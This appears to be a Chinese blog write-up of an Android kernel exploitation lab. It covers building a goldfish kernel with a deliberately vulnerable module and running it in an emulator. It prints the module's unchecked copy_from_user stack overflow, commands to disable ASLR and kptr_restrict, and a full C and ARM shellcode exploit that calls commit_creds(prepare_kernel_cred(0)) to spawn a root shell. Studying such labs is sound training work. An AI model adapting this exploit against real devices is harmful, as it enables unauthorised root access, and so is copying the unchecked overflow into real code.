linux 解压安卓kernel,android kernel | 环境搭建 + 第一次尝试

搭建环境过于艰辛,做个记录....

环境搭建

内核代码下载

git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git

漏洞项目代码下载

git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges

内核编译 和 准备工作:

准备 | 将 漏洞模块 编译进内核

cd goldfish && git checkout -t origin/android-goldfish-3.4 &&

git am --signoff < ../kernel_exploit_challenges/kernel_build/debug_symbols_and_challenges.patch &&

cd .. && ln -s $(pwd)/kernel_exploit_challenges/ goldfish/drivers/vulnerabilities

准备编译工具

下载 arm-linux-androideabi-4.6.tar.bz2

tar xvf arm-linux-androideabi-4.6.tar.bz2

export PATH=

PATH | 推荐将指令加入 〜/ .bashrc 一劳永逸

编译指令(在 goldfish 目录下)

make goldfish_armv7_defconfig && make -j8

安卓环境准备

解压 : tar xvf android-sdk_r24.4.1-linux.tgz

加入环境变量 : export PATH=/home/haclh/hacktools/android-sdk-linux/tools:$PATH

下载jdk

新开一个 shell , 运行 android (需要在加入环境变量步骤后使用)

下载下图中指定的jdk

image.png

下载后通过 android list targets 指令可以查看所有下载的 镜像文件

image.png

创建模拟器

android create avd --force -t "android-19" -n kernel_challenges

使用内核运行模拟器

emulator -show-kernel -kernel arch/arm/boot/zImage -avd kernel_challenges -no-boot-anim -no-skin -no-audio -no-window -qemu -monitor unix:/tmp/qemuSocket,server,nowait -s

android 动态调试 (goldfish 目录下运行如下指令)

arm-linux-androideabi-gdb vmlinux

第一次尝试 | 内核栈溢出提权

首先看看漏洞代码， kernel_exploit_challenges / challenge / stack_buffer_overflow / module / stack_buffer_overflow.c ：

#include

#include

#include

#include

#include

#include

#define MAX_LENGTH 64

MODULE_LICENSE("GPL");

MODULE_AUTHOR("Ryan Welton");

MODULE_DESCRIPTION("Stack Buffer Overflow Example");

static struct proc_dir_entry *stack_buffer_proc_entry;

int proc_entry_write(struct file *file, const char __user *ubuf, unsigned long count, void *data)

{

char buf[MAX_LENGTH];

if (copy_from_user(&buf, ubuf, count)) {

printk(KERN_INFO "stackBufferProcEntry: error copying data from userspacen");

return -EFAULT;

}

return count;

}

static int __init stack_buffer_proc_init(void)

{

stack_buffer_proc_entry = create_proc_entry("stack_buffer_overflow", 0666, NULL);

stack_buffer_proc_entry->write_proc = proc_entry_write;

printk(KERN_INFO "created /proc/stack_buffer_overflown");

return 0;

}

static void __exit stack_buffer_proc_exit(void)

{

if (stack_buffer_proc_entry) {

remove_proc_entry("stack_buffer_overflow", stack_buffer_proc_entry);

}

printk(KERN_INFO "vuln_stack_proc_entry removedn");

}

module_init(stack_buffer_proc_init);

module_exit(stack_buffer_proc_exit);

相关知识点

提权基础

用户态 | 内核态 区别 (EL1 | EL0 权限等级)

提权思路 : 利用 EL1 权限下可以执行的 EL0 级别的操作中的漏洞 , 在EL0 级别的操作过程中做到命令执行 , 提升用户等级 , 并反弹shell , 从而做到普通用户到 root 的提权 | 描述方式需要修改。。。

驱动编程 | 在这次利用过程中必要的知识

注册驱动 | module_init , open 时调用

stack_buffer_proc_entry->write_proc | 当对这个设备写入时 , 会调用 write_proc 对应的函数

copy_from_user(＆buf，ubuf，count) 从用户空间拷贝数据到buf

回到用户态:

下面就是要回到用户态，在x86平台有iret指令可以回到用户态，在arm下返回用户态就更简单了。在arm下cpsr寄存器的M [4： 0]位用来表示处理器的运行模式，具体可以看这个。所以我们把cpsr寄存器的M [4：0]位设置为10000后就表示处理器进入了用户模式。

漏洞点 :

proc_entry_write 没有对输入长度或字符内容做限制,造成栈溢出

这次可能遇到的相关缓解措施 及其缓解手段

ASLR

堆栈地址随机化 , 意味着shellcode地址需要动态调整

关闭方式 : echo 0 > proc/sys/kernel/randomize_va_space

kptr_restrict

内核层 的 pie | 动态加载 内核符号

/proc/kallsyms文件中保存着所有的内核符号的名称和它在内存中的位置

关闭方式 : echo 0 > proc/sys/kernel/kptr_restrict

相关作用 : 获取 commit_creds 和 prepare_kernel_cred 符号的地址,用来提权时使用

具体的利用思路:

- 1.调用 commit_creds(prepare_kernel_cred(0)) 提升权限

- 2.调用 mov r3，＃0x40000010; MSR CPSR_c，R3; 设置 cpsr 寄存器， 使cpu进入用户模式

- 3.然后执行 execl(“/ system / bin / sh”，“sh”，NULL); 起一个 root 权限的 shell

EXP:

#include

#include

#include

#include

#include

#define MAX 68

int open_file(void)

{

int fd = open("/proc/stack_buffer_overflow", O_RDWR);

if (fd == -1)

err(1, "open");

return fd;

}

void payload(void)

{

printf("[+] enjoy the shelln");

execl("/system/bin/sh", "sh", NULL);

}

extern uint32_t shellCode[];

asm

(

" .text\n"

" .align 2\n"

" .code 32\n"

" .globl shellCode\n\t"

"shellCode:\n\t"

// commit_creds(prepare_kernel_cred(0));

// -> get root

"LDR R3, =0xc0039d34\n\t" //prepare_kernel_cred addr

"MOV R0, #0\n\t"

"BLX R3\n\t"

"LDR R3, =0xc0039834\n\t" //commit_creds addr

"BLX R3\n\t"

"mov r3, #0x40000010\n\t"

"MSR CPSR_c,R3\n\t"

"LDR R3, =0x826d\n\t" // payload function addr

"BLX R3\n\t"

);

void trigger_vuln(int fd)

{

#define MAX_PAYLOAD (MAX + 4)

char buf[MAX_PAYLOAD];

memset(buf, 'A', sizeof(buf));

void * pc = buf + MAX;

*(void **)pc = (void *) shellCode; //ret addr

/* Kaboom! */

write(fd, buf, MAX_PAYLOAD );

}

int main(void)

{

int fd;

printf("shellcdoe addr: %p\n", shellCode);

printf("payload:%p\n", payload);

fd = open_file();

trigger_vuln(fd);

close(fd);

}

tip ：在本地测试会遇到的坑点

本次测试的漏洞时 栈溢出 , 可能在本地环境偏移不同

payload 加载地址变化

Illegal instruction | 非法指令 , 此报错执行exp 未进入内核态的操作.